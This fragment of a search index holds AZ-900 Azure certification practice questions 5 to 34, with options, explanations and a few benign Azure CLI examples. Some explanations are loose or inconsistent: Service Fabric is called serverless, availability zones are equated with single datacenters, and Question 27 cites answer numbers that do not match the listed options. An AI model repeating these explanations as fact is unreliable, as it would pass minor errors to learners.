        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-which-azure-service-is-meant-to-be-a-security-dashboard-that-contains-all-the-security-and-threat-protection-in-one-place","title":"Question 5:\u00a0Which Azure service is meant to be a security dashboard that contains all the security and threat protection in one place?","text":"
        • Azure Portal Dashboard
        • Azure Security Center
        • Azure Key Vault
        • Azure Monitor

        Explanation: Azure Security Center - unified security management and threat protection; a security dashboard inside Azure Portal. See:\u00a0https://azure.microsoft.com/en-us/services/security-center/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-what-is-a-ddos-attack","title":"Question 6: What is a DDoS attack?","text":"
        • A denial of service attack that sends so much traffic to a network that it cannot respond fast enough; legitimate users become unable to use the service
        • An attempt to read the contents of a web page from another website, thereby stealing the user's private information
        • An attempt to send SQL commands to the server in a way that it will execute them against the database
        • An attempt to guess a user's password through brute force methods

        Explanation: Distributed Denial of Service (DDoS) attacks are a type of attack that originates from the Internet and attempts to overwhelm a network with millions of packets of bad traffic, with the aim of preventing legitimate traffic from getting through. See: https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-in-the-context-of-cloud-computing-and-azure-services-how-would-you-define-compute-resources","title":"Question 7:\u00a0In the context of cloud computing and Azure services, how would you define 'compute resources'?","text":"
        • They include all resources listed in the Azure Marketplace.
        • They are resources that execute tasks requiring CPU cycles.
        • They refer exclusively to Virtual Machines.
        • They encompass Virtual Machines, Storage Accounts, and Virtual Networks.

        Explanation: The correct answer is \"They are resources that execute tasks requiring CPU cycles\". In cloud computing, the term \"compute\" refers to the amount of computational power required to process a task - essentially, it's anything that uses processing power (CPU cycles) to perform operations. This includes, but is not limited to, running applications, executing scripts, and processing data. While virtual machines (VMs) are a common type of compute resource, they are not the only type. Azure offers a wide variety of compute resources, like Azure Functions for serverless computing, Azure Kubernetes Service for container-based applications, and Azure Batch for parallel and high-performance computing tasks. So, the definition of compute resources is broader than just VMs or certain resources listed in the Azure Marketplace. It also includes more than VMs, Storage Accounts, and Virtual Networks, as these other resources (storage and networking) have distinct roles separate from the compute resources. Storage accounts deal with data storage while virtual networks are concerned with networking aspects in Azure, not with performing tasks that require CPU cycles. Therefore, \"They are resources that execute tasks requiring CPU cycles\" is the most accurate answer. See:\u00a0https://azure.microsoft.com/en-us/product-categories/compute/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-which-azure-service-contains-pre-built-machine-learning-models-that-you-can-use-in-your-own-code-using-an-api","title":"Question 8:\u00a0Which\u00a0Azure Service contains pre-built machine learning models that you can use in your own code, using an API?","text":"
        • Cognitive Services
        • Azure Functions
        • Azure Blueprints
        • App Services

        Explanation: Cognitive Services is an API that Azure provides, that gives access to a set of pre-built machine learning models including vision services, speech services, knowledge management and chat bots.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-in-microsoft-azure-what-is-the-maximum-number-of-virtual-machines-that-can-be-included-in-a-single-virtual-machine-scale-set-as-per-azures-standard-guidelines-and-capabilities","title":"Question 9: In Microsoft Azure, what is the maximum number of virtual machines that can be included in a single Virtual Machine Scale Set, as per Azure's standard guidelines and capabilities?","text":"
        • 10000
        • 1000
        • Unlimited
        • 500

        Explanation: The correct answer is 1000. Azure Virtual Machine Scale Sets are a service provided by Azure that allows you to manage, scale, and distribute large numbers of identical virtual machines. As per the limitations set by Microsoft Azure, a single Virtual Machine Scale Set can support up to 1000 VM instances. This capacity allows for high availability and network load balancing across a large number of virtual machines, providing a robust and efficient solution for applications that require heavy compute resources. However, if you are using custom VM images, this limit decreases to 600 instances. This functionality is part of Azure's Infrastructure as a Service (IaaS) offerings, providing flexibility and scalability to businesses and developers. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machine-scale-sets/overview
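        For illustration, a hedged sketch of creating a small scale set with Azure CLI; the names are placeholders, and the image alias varies by CLI version (older releases use e.g. UbuntuLTS):

        ```bash
        # Three identical, load-balanced VM instances in one scale set
        az vmss create --resource-group rg-demo --name vmss-demo \
          --image Ubuntu2204 --instance-count 3 \
          --admin-username azureuser --generate-ssh-keys
        ```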

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-what-feature-within-azure-will-make-recommendations-to-you-about-reducing-cost-on-your-account","title":"Question 10:\u00a0What feature within Azure will make recommendations to you about reducing cost on your account?","text":"
        • Azure Service Health
        • Azure Security Center
        • Azure Advisor
        • Azure Dashboard

        Explanation: Azure Advisor analyzes your account usage and makes recommendations for you based on its set rules. See:\u00a0https://docs.microsoft.com/en-us/azure/advisor/advisor-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-your-organization-has-implemented-an-azure-policy-that-restricts-the-type-of-virtual-machine-instances-you-can-use-how-can-you-create-a-vm-that-is-blocked-by-the-policy","title":"Question 11: Your organization has implemented an Azure Policy that restricts the type of Virtual Machine instances you can use. How can you create a VM that is blocked by the policy?","text":"
        • Use an account that has Contributor or above permissions to the resource group
        • Subscription Owners (Administrators) can create resources regardless of what the policy restricts
        • The only way is to remove the policy, create the resource and add the policy back

        Explanation: You cannot perform a task that violates policy, so you have to remove the policy in order to perform the task. See:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-you-have-decided-to-subscribe-to-azure-ddos-protection-at-the-ip-protection-tier-this-provides-advanced-protection-to-defend-against-ddos-attacks-what-type-of-ddos-attack-does-ddos-protection-not-protect-against","title":"Question 12:\u00a0You have decided to subscribe to Azure DDoS\u00a0Protection at the IP Protection Tier. This provides advanced protection to defend against DDoS attacks. What type of DDoS attack does DDoS Protection NOT\u00a0protect against?","text":"
        • Transport (L4)\u00a0level attacks
        • Application (L7) level attacks
        • Network (L3)\u00a0level attacks

        Explanation: The correct answer is \"Application level attacks\":

        • Network-level attacks\u00a0are attacks that target the network infrastructure, such as the routers and switches that connect your Azure resources to the internet. Azure DDoS Protection IP Protection Tier can protect against network-level attacks by absorbing and rerouting excessive traffic, and by scrubbing malicious traffic.

        • Transport-level attacks\u00a0are attacks that target the transport layer of the network protocol stack, such as TCP and UDP. Azure DDoS Protection IP Protection Tier can protect against transport-level attacks by absorbing and rerouting excessive traffic, and by scrubbing malicious traffic.

        • Application-level attacks\u00a0are attacks that target the application layer of the network protocol stack, such as HTTP and DNS. Azure DDoS Protection IP Protection Tier\u00a0does not\u00a0protect against application-level attacks, because it is designed to protect against network and transport-level attacks.

        To protect against application-level attacks, you need to use a web application firewall (WAF). A WAF is a software appliance that sits in front of your application and filters out malicious traffic. WAFs can be configured to protect against a wide variety of application-level attacks, such as SQL injection, cross-site scripting, and denial of service attacks. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-which-of-the-following-characteristics-of-a-cloud-based-system-primarily-contributes-to-its-elasticity","title":"Question 13: Which of the following characteristics of a cloud-based system primarily contributes to its elasticity?","text":"
        • The system's ability to recover automatically after a crash.
        • The system's ability to dynamically increase and decrease capacity based on real-time demand.
        • The system's ability to maintain availability while updates are being implemented.
        • The system's ability to withstand denial-of-service attacks.

        Explanation: The correct answer is \"The ability to increase and reduce capacity based on actual demand.\" This characteristic refers to the concept of\u00a0elasticity\u00a0in cloud computing. An elastic system\u00a0is one that can automatically adjust its resources\u00a0(compute, storage, etc.) in response to changing workloads and demands. This is done to ensure optimal performance and cost-effectiveness. When demand increases, the system can scale out by adding more resources, and when demand decreases, it can scale in by reducing resources, all without significant manual intervention. The other options, while important for overall system robustness, do not define elasticity. Withstanding denial of service attacks pertains to security, maintaining availability during updates refers to zero-downtime deployment or high availability, and self-healing after a crash refers to resilience or fault tolerance. None of these are about dynamically adjusting capacity based on demand, which is the hallmark of an elastic system. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-elastic-computing/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-logic-apps-functions-and-service-fabric-are-all-examples-of-what-model-of-compute-within-azure","title":"Question 14:\u00a0Logic apps, functions, and service fabric are all examples of what model of compute within Azure?","text":"
        • SaaS model
        • App Services Model
        • IaaS model
        • Serverless model

        Explanation: The correct answer is the Serverless model. Azure Logic Apps, Azure Functions, and Azure Service Fabric are all examples of serverless computing in Azure. Serverless computing is a cloud computing model where the cloud provider automatically manages the provisioning and allocation of servers, hence the term \"serverless\". The serverless model allows developers to focus on writing the code and business logic rather than worrying about the underlying infrastructure, its setup, maintenance, scaling, and capacity planning.

        • Azure Logic Apps is a cloud service that allows developers to build workflows that integrate apps, data, services, and systems.
        • Azure Functions is an event-driven, compute-on-demand experience that extends the existing Azure application platform with capabilities to implement code triggered by events occurring in Azure or third-party services.
        • Azure Service Fabric is a distributed systems platform that makes it easy to package, deploy, and manage scalable and reliable microservices.

        In contrast, IaaS (Infrastructure as a Service) refers to cloud-based services where you rent IT infrastructure\u2014servers and virtual machines (VMs), storage, networks, and operating systems\u2014from a cloud provider on a pay-as-you-go basis. SaaS (Software as a Service) is a software distribution model in which a third-party provider hosts applications and makes them available to customers over the Internet, which doesn't align with the services mentioned in the question. The App Services model is a platform for hosting web applications, REST APIs, and mobile backends, but it's not strictly serverless as it doesn't auto-scale in the same way. See:\u00a0https://azure.microsoft.com/en-us/solutions/serverless/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-what-is-a-primary-benefit-of-opting-for-a-consumption-based-pricing-model-over-a-time-based-pricing-model-in-cloud-services","title":"Question 15: What is a primary benefit of opting for a consumption-based pricing model over a time-based pricing model in cloud services?","text":"
        • The ability to easily predict the future cost of the service.
        • It always being cheaper to pay for consumption rather than paying hourly.
        • Significant cost savings when the resources aren't needed for constant use.
        • A simpler and easier-to-understand pricing model.

        Explanation: The correct answer is \"Significant cost savings when the resources aren't needed for constant use\". In a consumption-based pricing model, also known as pay-as-you-go, customers are billed only for the specific resources they use. This model provides cost-efficiency for workloads with variable usage patterns or for resources that aren't needed continuously.

        When compared to a time-based pricing model, where resources are billed on a fixed schedule regardless of actual use (for example, hourly or monthly), consumption-based pricing can result in significant cost savings if the resources are not used often or their usage fluctuates.

        While the other options can be true in certain cases, they aren't inherently beneficial aspects of the consumption-based model. The cost predictability can be challenging due to the variable nature of usage (Answer 1), it's not always cheaper (Answer 2) as it depends on the resource usage pattern, and the simplicity of the pricing model (Answer 4) depends on the specific terms and conditions of the service provider. Therefore, the most accurate and generalizable benefit is the potential for cost savings with infrequent or variable resource use. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-functions/functions-consumption-costs

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-in-microsoft-azure-which-tool-or-service-allows-for-the-organization-and-management-of-multiple-subscriptions-within-hierarchical-structures","title":"Question 16: In Microsoft Azure, which tool or service allows for the organization and management of multiple subscriptions within hierarchical structures?","text":"
        • RBAC (Role-Based Access Control)
        • Management Groups
        • Azure Active Directory
        • Resource Groups

        Explanation: The correct answer is\u00a0Management Groups. In Azure, Management Groups provide a way to manage access, policies, and compliance for multiple subscriptions. They can be structured into a hierarchy for the organization's needs. All subscriptions within a Management Group automatically inherit the conditions applied to the Management Group, facilitating governance on a large scale.

        Resource Groups, on the other hand, are containers for resources deployed on Azure. They do not provide management capabilities across multiple subscriptions.

        RBAC (Role-Based Access Control)\u00a0is a system that provides fine-grained access management to Azure resources but it doesn't inherently support the organization of subscriptions into hierarchies.

        Azure Active Directory\u00a0is a service that provides identity and access management capabilities but does not provide a direct mechanism for managing multiple subscriptions in nested hierarchies.

        Hence, Management Groups is the correct answer as it directly allows for the management and organization of multiple subscriptions into nested hierarchies, which the other options do not. See:\u00a0https://docs.microsoft.com/en-us/azure/governance/management-groups/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-which-feature-of-azure-active-directory-will-require-users-to-have-their-mobile-phone-in-order-to-be-able-to-log-in","title":"Question 17:\u00a0Which feature of Azure Active Directory will require users to have their mobile phone in order to be able to log in?","text":"
        • Azure Security Center
        • Multi-Factor Authentication
        • Azure Information Protection (AIP)
        • Advanced Threat Protection (ATP)

        Explanation: Multi-Factor Authentication (MFA) is the concept of requiring something in addition to a "password" to log in; passwords are findable or guessable, but having your mobile phone on you to receive a phone call, a text, or an app-generated code is harder for an unknown hacker to get. See: https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-who-is-responsible-for-the-security-of-the-physical-servers-in-an-azure-data-center","title":"Question 18: Who is responsible for the security of the physical servers in an Azure data center?","text":"
        • Azure is responsible for securing the physical data centers
        • I am responsible for securing the physical data centers

        Explanation: Azure is responsible for physical security. See:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/physical-security

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-true-or-false-azure-is-a-public-cloud-and-has-no-private-cloud-offerings","title":"Question 19:\u00a0True or False: Azure is a public cloud, and has no private cloud offerings","text":"
        • TRUE
        • FALSE

        Explanation: The correct answer is FALSE. While Azure is indeed widely recognized as a public cloud provider, offering a vast array of services accessible via the internet on a multi-tenant basis, it does also provide private cloud capabilities. One notable offering is Azure Stack, an extension of Azure that allows businesses to run apps in an on-premises environment and deliver Azure services in their datacenter. With Azure Stack, you get the flexibility of using Azure's cloud capabilities while maintaining your own datacenter for privacy, regulatory compliance, or other requirements. Additionally, Azure offers services such as Azure Private Link, which provides private connectivity from a virtual network to Azure services, and Azure ExpressRoute, a service that enables a private, dedicated network connection to Azure. So, contrary to the statement, Azure does have private cloud offerings along with its public cloud, making the statement FALSE. See:

        • https://azure.microsoft.com/en-us/overview/what-is-a-private-cloud/
        • https://azure.microsoft.com/en-us/global-infrastructure/government/
        • https://azure.microsoft.com/en-us/overview/azure-stack/
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-who-is-responsible-for-the-security-of-your-azure-storage-account-access-keys","title":"Question 20:\u00a0Who is responsible for the security of your Azure Storage account access keys?","text":"
        • Azure is responsible for securing the access keys
        • I am responsible for securing the access keys

        Explanation: Customers are responsible for securing the access keys they are given and for regenerating them if they are exposed. See: https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage
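        A minimal sketch of rotating an exposed key with Azure CLI (names are placeholders):

        ```bash
        # Regenerate the primary key; update any clients that used the old one
        az storage account keys renew --resource-group rg-demo \
          --account-name stdemo001 --key primary
        ```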

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-which-feature-within-azure-collects-all-of-the-logs-from-various-resources-into-a-central-dashboard-where-you-can-run-queries-view-graphs-and-create-alerts-on-certain-events","title":"Question 21:\u00a0Which feature within Azure collects all of the logs from various resources into a central dashboard, where you can run queries, view graphs, and create alerts on certain events?","text":"
        • Azure Portal Dashboard
        • Azure Monitor
        • Azure Security Center
        • Storage Account or Event Hub

        Explanation: Azure Monitor - a centralized dashboard that collects all the logs, metrics and events from your resources. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-monitor/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-when-establishing-a-site-to-site-vpn-connection-with-azure-what-kind-of-network-device-needs-to-be-present-or-installed-in-your-companys-on-premises-network-infrastructure","title":"Question 22: When establishing a Site-to-Site VPN connection with Azure, what kind of network device needs to be present or installed in your company's on-premises network infrastructure?","text":"
        • An Azure Virtual Network
        • An Application Gateway
        • A dedicated virtual machine
        • A compatible VPN Gateway device

        Explanation: The correct answer is a compatible VPN Gateway device. In order to establish a site-to-site VPN connection with Azure, a VPN Gateway is required on your company's internal network. A VPN Gateway is a specific type of virtual network gateway that sends encrypted traffic across a public network, like the Internet. While the name might suggest it's a purely virtual entity, in practice, the term \"VPN Gateway\" often refers to a hardware device that's installed on-premises in your data center. This device uses Internet Protocol security (IPsec) to establish a secure, encrypted connection to the Azure VPN Gateway, which resides in the Azure virtual network. This setup allows your local network and Azure to interact as if they're directly connected. In contrast, virtual machines, virtual networks, and application gateways are other types of Azure resources, but they do not facilitate creating a site-to-site VPN connection. It's important to note that your company's internal network hardware and settings must meet specific requirements to support a VPN Gateway. See:\u00a0https://docs.microsoft.com/en-us/azure/vpn-gateway/vpn-gateway-howto-site-to-site-resource-manager-portal

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-which-of-the-following-is-something-that-azure-cognitive-services-api-can-currently-do","title":"Question 23:\u00a0Which of the following is something that Azure Cognitive Services API can currently do?","text":"
        • Translate text from one language to another
        • All of these! Azure can do it all!
        • Speak text in an extremely realistic way
        • Create text from audio
        • Recognize text in an image

        Explanation: Azure can do all of them, of course. See:\u00a0https://docs.microsoft.com/en-us/azure/cognitive-services/welcome

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-which-of-the-following-azure-features-is-most-likely-to-deliver-the-most-immediate-savings-when-it-comes-to-reducing-azure-costs","title":"Question 24:\u00a0Which of the following Azure features is most likely to deliver the most immediate savings when it comes to reducing Azure costs?","text":"
        • Changing your storage accounts from globally redundant (GRS) to locally redundant (LRS)
        • Auto shutdown of development and QA servers over night and on weekends
        • Using Azure Reserved Instances for most of your virtual machines
        • Using Azure Policy to restrict the use of expensive VM SKUs

        Explanation: Reserved Instances often offer savings of 40% or more off the price of pay-as-you-go virtual machines. See:\u00a0https://docs.microsoft.com/en-us/azure/cost-management-billing/reservations/save-compute-costs-reservations

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-in-the-context-of-azures-high-availability-solutions-what-is-the-primary-purpose-of-azure-availability-zones","title":"Question 25:\u00a0In the context of Azure's high availability solutions, what is the primary purpose of Azure Availability Zones?","text":"
        • They serve as a folder structure in Azure used for organizing resources such as databases, virtual machines, and virtual networks.
        • They are synonymous with an Azure region.
        • They allow manual selection of data centers for virtual machine placement to achieve superior availability compared to other options.
        • They represent certain server racks within individual data centers, specifically designed by Azure for higher uptime.

        Explanation: The correct answer is: \"They allow manual selection of data centers for virtual machine placement to achieve superior availability compared to other options.\"

        Azure Availability Zones are a high availability offering that protects applications and data from datacenter failures. Each Azure region is composed of multiple datacenters, and each datacenter is essentially an Availability Zone. They are unique physical locations within a region, equipped with their own independent power, cooling, and networking. By placing your resources across different Availability Zones within a region, you can protect your apps and data from the failure of a single datacenter. If one datacenter goes down, the resources in the other datacenters (Availability Zones) can continue to operate, providing redundancy and increasing the overall availability of your applications. It's important to note that these zones are not the same as Azure regions (which are geographical areas containing one or more datacenters), nor are they equivalent to resource groups (which are logical containers for resources deployed on Azure). They are also not isolated to specific racks within a datacenter, but rather spread across different datacenters in a region, offering a broader scope of protection. See:\u00a0https://docs.microsoft.com/en-us/azure/availability-zones/az-overview
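
        As a small, hedged example of putting this into practice, a zonal VM deployment with the Azure CLI; the resource names and image alias are placeholders:

        ```bash
        # Pin a VM to availability zone 1 in a zone-enabled region
        az vm create \
          --resource-group my-rg \
          --name web-01 \
          --image Ubuntu2204 \
          --zone 1 \
          --admin-username azureuser \
          --generate-ssh-keys
        ```

        Deploying a second VM with --zone 2 behind a load balancer is what actually provides the cross-datacenter resilience described above.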

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-which-of-the-following-characteristics-is-essential-for-a-system-to-be-considered-highly-available-in-a-cloud-computing-environment","title":"Question 26:\u00a0Which of the following characteristics is essential for a system to be considered highly available in a cloud computing environment?","text":"
        • The system must maintain 100% availability at all times.
        • The system must be designed for resilience, with no single points of failure.
        • It's impossible to create a highly available system.
        • The system must operate on a minimum of two virtual machines.

        Explanation: The correct answer is \"The system must be designed for resilience, with no single points of failure\". High availability means that a system is designed to operate continuously, without failure, for a long period of time. This is achieved by building redundancy into the system, eliminating single points of failure, and enabling rapid recovery from any failures that do occur. In other words, even if a component of the system fails, other components can take over, allowing the system to continue operating seamlessly. While high availability often aims for close to 100% uptime, maintaining 100% availability is practically unrealistic due to factors like maintenance needs and unexpected failures. Also, having a minimum of two VMs may contribute to high availability but is not a definitive requirement; it depends on the specifics of the system architecture. Finally, the assertion that it is impossible to create a highly available system is incorrect: there are established strategies and technologies for designing and operating highly available systems, and they are widely used in mission-critical applications across many industries. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machines/windows/availability

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-in-the-context-of-cloud-computing-how-is-the-benefit-of-agility-best-described","title":"Question 27: In the context of cloud computing, how is the benefit of 'agility' best described?","text":"
        • It refers to the ability to swiftly recover from a large-scale regional failure.
        • It refers to the ability to quickly respond to and drive changes in the market.
        • It refers to the system's ability to easily scale up when it reaches full capacity.
        • It refers to the ability to rapidly provision new resources.

        Explanation: The correct answer is \"It refers to the ability to quickly respond to and drive changes in the market\". Agility, in the context of cloud computing, refers to the ability of an organization to rapidly adapt to market and environmental changes in productive and cost-effective ways. It involves quickly adjusting and adapting strategic and operational capabilities to respond to and take advantage of changes in the business environment. The other options, while also benefits of the cloud, do not directly align with the concept of agility. Spinning up new resources quickly (Answer 2) or growing capacity easily when full (Answer 3) relate more to the cloud's scalability and elasticity. The ability to recover from a region-wide failure rapidly (Answer 4) speaks to the cloud's resilience and disaster recovery capabilities. While these aspects can contribute to overall business agility, they don't encapsulate the broader strategic meaning of agility - the capacity to quickly adjust to market changes, which can include shifts in customer demand, competitive pressures, or regulatory changes, among others. Hence, the ability to respond to and drive market change quickly is the most accurate answer. See:\u00a0https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/strategy/business-outcomes/agility-outcomes

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-if-you-wanted-to-simply-use-azure-as-an-extension-of-your-own-datacenter-not-primarily-hosting-anything-there-but-using-it-for-extra-storage-or-taking-advantage-of-some-services-what-hosting-model-is-that-called","title":"Question 28: If you wanted to simply use Azure as an extension of your own datacenter, not primarily hosting anything there but using it for extra storage or taking advantage of some services, what hosting model is that called?","text":"
        • Public cloud
        • Hybrid cloud
        • Private cloud

        Explanation: The correct answer is \"Hybrid cloud.\" The scenario described in the question is a typical use case for a hybrid cloud model, which integrates private cloud or on-premises infrastructure with public cloud resources, such as those provided by Azure. In a hybrid cloud model, businesses can keep sensitive data or critical applications on their private cloud or on-premises datacenter for security and compliance reasons while using the public cloud's vast resources for additional storage, computational power, or specific services when necessary. This not only allows for greater flexibility and scalability, but also offers potential cost savings. In contrast, a purely public cloud model involves hosting all data and applications on a public cloud provider's infrastructure, and a purely private cloud model involves hosting everything on a business's own infrastructure or a rented, single-tenant infrastructure. The described scenario of extending an on-premises datacenter with Azure services fits best with the hybrid cloud model. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-hybrid-cloud-computing/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-in-the-context-of-cloud-computing-a-virtual-machine-vm-is-primarily-associated-with-which-type-of-cloud-hosting-model","title":"Question 29: In the context of cloud computing, a virtual machine (VM) is primarily associated with which type of cloud hosting model?","text":"
        • Software as a Service (SaaS)
        • Infrastructure as a Service (IaaS)
        • Platform as a Service (PaaS)

        Explanation: The correct answer is IaaS, which stands for Infrastructure as a Service. In the context of cloud computing, a virtual machine (VM) is typically provided as part of an IaaS offering. With IaaS, the provider manages the underlying physical infrastructure (like servers, network equipment, and storage), while the consumer controls the virtualized components of the infrastructure, such as the virtual machines, their operating systems, and the applications running on them. This is contrasted with the other options. In a Platform as a Service (PaaS) model, the consumer only controls the applications and possibly some configuration settings for the application-hosting environment, but does not manage the operating system, server hardware, or network infrastructure. Similarly, in a Software as a Service (SaaS) model, the consumer only uses the software and does not control any aspect of the infrastructure or platform where the application runs. Therefore, given that a virtual machine involves control over the operating system and applications within a cloud-managed infrastructure, it aligns with the IaaS hosting model. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-which-of-the-following-best-describes-the-primary-benefit-of-a-content-delivery-network-cdn-in-a-cloud-computing-context","title":"Question 30:\u00a0Which of the following best describes the primary benefit of a Content Delivery Network (CDN) in a cloud computing context?","text":"
        • For a nominal fee, Azure will manage your virtual machine, perform OS updates, and ensure optimal performance.
        • It mitigates server load for static, unchanging files like images, videos, and PDFs by distributing them across a network of servers.
        • It enables temporary session information storage for web visitors, such as their login ID or name.
        • It provides fast and inexpensive data retrieval for later use.

        Explanation: The correct answer, \"It mitigates server load for static, unchanging files\", is indeed the core benefit of a Content Delivery Network (CDN). A CDN stores copies of a website's static files on servers distributed globally. These static files could be anything that doesn't change frequently, like images, CSS, JavaScript, videos, etc. When a user visits the site, they are served these static files from the CDN server nearest to them geographically. This reduces the latency, as the data has a shorter distance to travel. Additionally, it reduces the load on the original server because the CDN handles a significant portion of the traffic. As a result, not only is the user experience improved due to faster load times, but the operational efficiency and performance of the original server are also enhanced. Therefore, CDNs are essential for sites serving large amounts of static content to a geographically dispersed user base. See:\u00a0https://docs.microsoft.com/en-us/azure/cdn/cdn-overview
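
        A minimal sketch of standing up a CDN with the Azure CLI; the profile, endpoint, and origin host names are placeholders:

        ```bash
        # Create a CDN profile, then an endpoint that caches static files from an origin
        az cdn profile create \
          --resource-group my-rg \
          --name my-cdn-profile \
          --sku Standard_Microsoft

        az cdn endpoint create \
          --resource-group my-rg \
          --profile-name my-cdn-profile \
          --name my-cdn-endpoint \
          --origin www.example.com
        ```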

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-what-is-the-name-of-the-group-of-services-inside-azure-that-hosts-the-apache-hadoop-big-data-analysis-tools","title":"Question 31: What is the name of the group of services inside Azure that hosts the Apache Hadoop big data analysis tools?","text":"
        • Azure Hadoop Services
        • Azure Data Factory
        • HDInsight
        • Azure Kubernetes Services

        Explanation: The correct answer is HDInsight. HDInsight is Microsoft Azure's offering for hosting the Apache Hadoop big data analysis tools. Apache Hadoop is an open-source software platform that supports data-intensive distributed applications. This platform enables processing large amounts of data across clusters of computers. Azure HDInsight is a cloud distribution of the Hadoop components from the Hortonworks Data Platform. It allows Azure users to process vast amounts of data with popular open-source frameworks such as Hadoop, Hive, HBase, Storm, and others. Additionally, the HDInsight service also supports R, Python, Scala, and .NET. So, it's not just limited to traditional Hadoop tools. Options like 'Azure Hadoop Services' and 'Azure Data Factory' are incorrect as Azure doesn't have a service named 'Azure Hadoop Services' and 'Azure Data Factory' is a cloud-based data integration service. 'Azure Kubernetes Services' is a service for managing containerized applications, not specifically for Hadoop. See:\u00a0https://azure.microsoft.com/en-us/services/hdinsight/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-within-the-landscape-of-cloud-service-models-how-would-microsofts-outlook-365-be-best-categorized","title":"Question 32: Within the landscape of cloud service models, how would Microsoft's Outlook 365 be best categorized?","text":"
        • Infrastructure as a Service (IaaS)
        • Software as a Service (SaaS)
        • Platform as a Service (PaaS)

        Explanation: The correct answer is SaaS, which stands for Software as a Service. Outlook 365, part of Microsoft's Office 365 suite, is a cloud-based service that provides access to various applications and services, including email, calendars, and contact management, which are delivered over the internet. In a SaaS model, the service provider is responsible for the infrastructure, platform, and software, and ensures their maintenance and updates. Users simply access the services via a web browser or app, without needing to worry about the underlying infrastructure, platform, or software updates. This contrasts with Infrastructure as a Service (IaaS), where the user is responsible for managing the operating systems, middleware, and applications, and Platform as a Service (PaaS), where the user manages only the applications and data. In both these models, the users have more responsibilities compared to SaaS. Since Outlook 365 is a software application delivered over the web with all underlying infrastructure and platform taken care of by Microsoft, it falls into the SaaS hosting model. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-saas/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-which-major-cloud-provider-offers-the-most-international-locations-for-customers-to-provision-virtual-machines-and-other-servers","title":"Question 33:\u00a0Which major cloud provider offers the most international locations for customers to provision virtual machines and other servers?","text":"
        • Microsoft Azure
        • Google Cloud Platform
        • Amazon AWS

        Explanation: Microsoft Azure offers the most extensive global coverage among major cloud providers regarding geographical regions. This allows customers to provision virtual machines, databases, and other services in various international locations closer to their user base, which can enhance performance, reduce latency, and comply with local regulations regarding data residency. While AWS (Amazon Web Services) and GCP (Google Cloud Platform) also provide many regions globally, Microsoft Azure has distinguished itself with the broadest regional availability. See:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/regions/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-which-azure-website-tool-is-available-for-you-to-estimate-the-future-costs-of-your-azure-products-and-services-by-adding-products-to-a-shopping-basket-and-helping-you-calculate-the-costs","title":"Question 34:\u00a0Which Azure website tool is available for you to estimate the future costs of your Azure products and services by adding products to a shopping basket and helping you calculate the costs?","text":"
        • Azure Pricing Calculator
        • Microsoft Docs
        • Azure Advisor

